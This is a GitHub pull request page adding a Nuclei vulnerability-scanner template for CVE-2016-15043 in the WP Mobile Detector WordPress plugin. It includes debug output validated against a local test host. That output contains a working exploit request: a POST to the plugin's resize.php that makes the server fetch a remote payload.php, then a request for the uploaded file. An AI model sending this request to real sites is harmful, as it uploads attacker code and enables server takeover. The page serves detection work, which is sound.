CVE-2016-15043-WP-Mobile-Detector-1734970523760189704 #14679
Closed
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
/claim #14673
PR Information
Added CVE-2016-15043
References:
https://aadityapurani.com/2016/06/03/mobile-detector-poc/
https://blog.sucuri.net/2016/06/wp-mobile-detector-vulnerability-being-exploited-in-the-wild.html
Template validation
Validated with a host running a vulnerable version and/or configuration (True Positive)
Validated with a host running a patched version and/or configuration (avoid False Positive)
Additional Details (leave it blank if not applicable)
The template was verified against a local environment running the vulnerable resize.php from WP Mobile Detector 3.5.
Nuclei Debug Output (True Positive):
[CVE-2016-15043] Dumped HTTP request for http://127.0.0.1:8000/wp-content/plugins/wp-mobile-detector/resize.php
POST /wp-content/plugins/wp-mobile-detector/resize.php HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Connection: close
Content-Length: 37
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
src=http://127.0.0.1:9000/payload.php
[CVE-2016-15043] Dumped HTTP response http://127.0.0.1:8000/wp-content/plugins/wp-mobile-detector/resize.php
HTTP/1.1 200 OK
Connection: close
Content-Length: 28
Content-Type: text/html; charset=UTF-8
Date: Fri, 02 Jan 2026 12:28:55 GMT
Host: 127.0.0.1:8000
X-Powered-By: PHP/8.3.6
[CVE-2016-15043] Dumped HTTP request for http://127.0.0.1:8000/wp-content/plugins/wp-mobile-detector/cache/payload.php
GET /wp-content/plugins/wp-mobile-detector/cache/payload.php HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36
Connection: close
Accept-Encoding: gzip
[CVE-2016-15043] Dumped HTTP response http://127.0.0.1:8000/wp-content/plugins/wp-mobile-detector/cache/payload.php
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Fri, 02 Jan 2026 12:28:55 GMT
Host: 127.0.0.1:8000
X-Powered-By: PHP/8.3.6
VULNERABLE
Additional References:
Nuclei Template Creation Guideline
Nuclei Template Matcher Guideline
Nuclei Template Contribution Guideline
PD-Community Discord server